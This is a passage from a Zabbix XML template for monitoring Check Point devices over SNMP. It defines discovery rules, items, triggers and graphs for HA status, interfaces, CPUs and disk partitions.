                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description/>
                    <item_prototypes>
                        <item_prototype>
                            <name>HA Problem Status [{#SNMPVALUE}]</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::haProblemStatus.{#SNMPINDEX}</snmp_oid>
                            <key>haProblemStatus[{#SNMPVALUE}]</key>
                            <delay>120</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>4</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Check Point General Stats</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:haProblemStatus[{#SNMPVALUE}].str(OK)}=0</expression>
                            <name>HA Status [{#SNMPVALUE}]</name>
                            <url/>
                            <status>0</status>
                            <priority>3</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes/>
                </discovery_rule>
				<discovery_rule>
                    <name>Network interfaces</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>IF-MIB::ifDescr</snmp_oid>
                    <key>ifDescr</key>
                    <delay>3600</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description>You may also consider using IF-MIB::ifType or IF-MIB::ifAlias for discovery depending on your filtering needs.

{$SNMP_COMMUNITY} is a global macro.</description>
                    <item_prototypes>
                        <item_prototype>
                            <name>Admin status of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifAdminStatus.{#SNMPINDEX}</snmp_oid>
                            <key>ifAdminStatus[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The desired state of the interface.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap>
                                <name>SNMP interface status (ifAdminStatus)</name>
                            </valuemap>
                        </item_prototype>
                        <item_prototype>
                            <name>Alias of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifAlias.{#SNMPINDEX}</snmp_oid>
                            <key>ifAlias[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Description of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifDescr.{#SNMPINDEX}</snmp_oid>
                            <key>ifDescr[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>A textual string containing information about the interface.  This string should include the name of the manufacturer, the product name and the version of the interface hardware/software.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Inbound errors on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifInErrors.{#SNMPINDEX}</snmp_oid>
                            <key>ifInErrors[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>For packet-oriented interfaces, the number of inbound packets that contained errors preventing them from being deliverable to a higher-layer protocol.  For character-oriented or fixed-length interfaces, the number of inbound transmission units that contained errors preventing them from being deliverable to a higher-layer protocol.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Incoming traffic on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>1</multiplier>
                            <snmp_oid>IF-MIB::ifInOctets.{#SNMPINDEX}</snmp_oid>
                            <key>ifInOctets[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>bps</units>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>8</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The number of octets in valid MAC frames received on this interface, including the MAC header and FCS.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Operational status of interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifOperStatus.{#SNMPINDEX}</snmp_oid>
                            <key>ifOperStatus[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The current operational state of the interface.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap>
                                <name>SNMP interface status (ifOperStatus)</name>
                            </valuemap>
                        </item_prototype>
                        <item_prototype>
                            <name>Outbound errors on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>IF-MIB::ifOutErrors.{#SNMPINDEX}</snmp_oid>
                            <key>ifOutErrors[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>For packet-oriented interfaces, the number of outbound packets that could not be transmitted because of errors. For character-oriented or fixed-length interfaces, the number of outbound transmission units that could not be transmitted because of errors.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Outgoing traffic on interface $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>1</multiplier>
                            <snmp_oid>IF-MIB::ifOutOctets.{#SNMPINDEX}</snmp_oid>
                            <key>ifOutOctets[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>bps</units>
                            <delta>1</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>8</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The number of octets transmitted in MAC frames on this interface, including the MAC header and FCS.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Interfaces</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:ifOperStatus[{#SNMPVALUE}].diff(0)}=1</expression>
                            <name>Operational status was changed on {HOST.NAME} interface {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>1</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Traffic on interface {#SNMPVALUE}</name>
                            <width>900</width>
                            <height>200</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>100.0000</yaxismax>
                            <show_work_period>1</show_work_period>
                            <show_triggers>1</show_triggers>
                            <type>0</type>
                            <show_legend>1</show_legend>
                            <show_3d>0</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
                                    <sortorder>0</sortorder>
                                    <drawtype>5</drawtype>
                                    <color>00AA00</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>ifInOctets[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>5</drawtype>
                                    <color>3333FF</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>ifOutOctets[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>
				<discovery_rule>
                    <name>Processor Discovery</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>CHECKPOINT-MIB::multiProcIndex</snmp_oid>
                    <key>multiProc</key>
                    <delay>240</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                    <snmpv3_securitylevel>2</snmpv3_securitylevel>
                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>:</filter>
                    <lifetime>30</lifetime>
                    <description/>
                    <item_prototypes>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] Idle Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcIdleTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcIdleTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] System Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcSystemTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcSystemTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Processor [{#SNMPVALUE}] User Time</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>CHECKPOINT-MIB::multiProcUserTime.{#SNMPINDEX}</snmp_oid>
                            <key>multiProcUserTime[{#SNMPVALUE}]</key>
                            <delay>90</delay>
                            <history>90</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                            <snmpv3_securitylevel>2</snmpv3_securitylevel>
                            <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                            <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description/>
                            <inventory_link>0</inventory_link>
                            <applications/>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:multiProcIdleTime[{#SNMPVALUE}].avg(300)}&lt;25</expression>
                            <name>{HOSTNAME} Processor usage high on CPU {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>3</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Processor usage CPU {#SNMPVALUE}</name>
                            <width>900</width>
                            <height>200</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>100.0000</yaxismax>
                            <show_work_period>1</show_work_period>
                            <show_triggers>0</show_triggers>
                            <type>1</type>
                            <show_legend>1</show_legend>
                            <show_3d>0</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
                                    <sortorder>0</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>CC0000</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcSystemTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>1</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>0000C8</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcUserTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                                <graph_item>
                                    <sortorder>2</sortorder>
                                    <drawtype>1</drawtype>
                                    <color>00C800</color>
                                    <yaxisside>0</yaxisside>
                                    <calc_fnc>2</calc_fnc>
                                    <type>0</type>
                                    <item>
                                        <host>Template CheckPoint SNMP</host>
                                        <key>multiProcIdleTime[{#SNMPVALUE}]</key>
                                    </item>
                                </graph_item>
                            </graph_items>
                        </graph_prototype>
                    </graph_prototypes>
                </discovery_rule>
                <discovery_rule>
                    <name>Disk partitions</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>HOST-RESOURCES-MIB::hrStorageDescr</snmp_oid>
                    <key>hrStorageDescr</key>
                    <delay>3600</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <filter>{#SNMPVALUE}:@Storage devices for SNMP discovery</filter>
                    <lifetime>30</lifetime>
                    <description>The rule will discover all dis partitions matching the global regexp &quot;Storage devices for SNMP discovery&quot;.

{$SNMP_COMMUNITY} is a global macro.</description>
                    <item_prototypes>
                        <item_prototype>
                            <name>Allocation units for storage $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageAllocationUnits.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageAllocationUnits[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The size, in bytes, of the data objects allocated from this pool.  If this entry is monitoring sectors, blocks, buffers, or packets, for example, this number will commonly be greater than one.  Otherwise this number will typically be one.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Description of storage $1</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageDescr.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageDescr[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>1</value_type>
                            <allowed_hosts/>
                            <units/>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>A description of the type and instance of the storage described by this entry.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Total disk space on $1</name>
                            <type>15</type>
                            <snmp_community/>
                            <multiplier>0</multiplier>
                            <snmp_oid/>
                            <key>hrStorageSizeInBytes[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params>last(&quot;hrStorageSize[{#SNMPVALUE}]&quot;) * last(&quot;hrStorageAllocationUnits[{#SNMPVALUE}]&quot;)</params>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>This is a calculated item, we need it to get total disk space in bytes.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Total disk space on $1 in units</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageSize.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageSize[{#SNMPVALUE}]</key>
                            <delay>3600</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>units</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The size of the storage represented by this entry, in units of hrStorageAllocationUnits. This object is writable to allow remote configuration of the size of the storage area in those cases where such an operation makes sense and is possible on the underlying system. For example, the amount of main memory allocated to a buffer pool might be modified or the amount of disk space allocated to virtual memory might be modified.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Used disk space on $1</name>
                            <type>15</type>
                            <snmp_community/>
                            <multiplier>0</multiplier>
                            <snmp_oid/>
                            <key>hrStorageUsedInBytes[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>B</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params>last(&quot;hrStorageUsed[{#SNMPVALUE}]&quot;) * last(&quot;hrStorageAllocationUnits[{#SNMPVALUE}]&quot;)</params>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>This is a calculated item, we need it to get used disk space in bytes.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                        <item_prototype>
                            <name>Used disk space on $1 in units</name>
                            <type>4</type>
                            <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                            <multiplier>0</multiplier>
                            <snmp_oid>HOST-RESOURCES-MIB::hrStorageUsed.{#SNMPINDEX}</snmp_oid>
                            <key>hrStorageUsed[{#SNMPVALUE}]</key>
                            <delay>60</delay>
                            <history>7</history>
                            <trends>365</trends>
                            <status>0</status>
                            <value_type>3</value_type>
                            <allowed_hosts/>
                            <units>units</units>
                            <delta>0</delta>
                            <snmpv3_securityname/>
                            <snmpv3_securitylevel>0</snmpv3_securitylevel>
                            <snmpv3_authpassphrase/>
                            <snmpv3_privpassphrase/>
                            <formula>1</formula>
                            <delay_flex/>
                            <params/>
                            <ipmi_sensor/>
                            <data_type>0</data_type>
                            <authtype>0</authtype>
                            <username/>
                            <password/>
                            <publickey/>
                            <privatekey/>
                            <port/>
                            <description>The amount of the storage represented by this entry that is allocated, in units of hrStorageAllocationUnits.</description>
                            <inventory_link>0</inventory_link>
                            <applications>
                                <application>
                                    <name>Disk partitions</name>
                                </application>
                            </applications>
                            <valuemap/>
                        </item_prototype>
                    </item_prototypes>
                    <trigger_prototypes>
                        <trigger_prototype>
                            <expression>{Template CheckPoint SNMP:hrStorageUsed[{#SNMPVALUE}].last(0)} / {Template CheckPoint SNMP:hrStorageSize[{#SNMPVALUE}].last(0)} &gt; 0.8</expression>
                            <name>Free disk space is less than 20% on volume {#SNMPVALUE}</name>
                            <url/>
                            <status>0</status>
                            <priority>2</priority>
                            <description/>
                            <type>0</type>
                        </trigger_prototype>
                    </trigger_prototypes>
                    <graph_prototypes>
                        <graph_prototype>
                            <name>Disk space usage {#SNMPVALUE}</name>
                            <width>600</width>
                            <height>340</height>
                            <yaxismin>0.0000</yaxismin>
                            <yaxismax>0.0000</yaxismax>
                            <show_work_period>0</show_work_period>
                            <show_triggers>0</show_triggers>
                            <type>2</type>
                            <show_legend>1</show_legend>
                            <show_3d>1</show_3d>
                            <percent_left>0.0000</percent_left>
                            <percent_right>0.0000</percent_right>
                            <ymin_type_1>0</ymin_type_1>
                            <ymax_type_1>0</ymax_type_1>
                            <ymin_item_1>0</ymin_item_1>
                            <ymax_item_1>0</ymax_item_1>
                            <graph_items>
                                <graph_item>
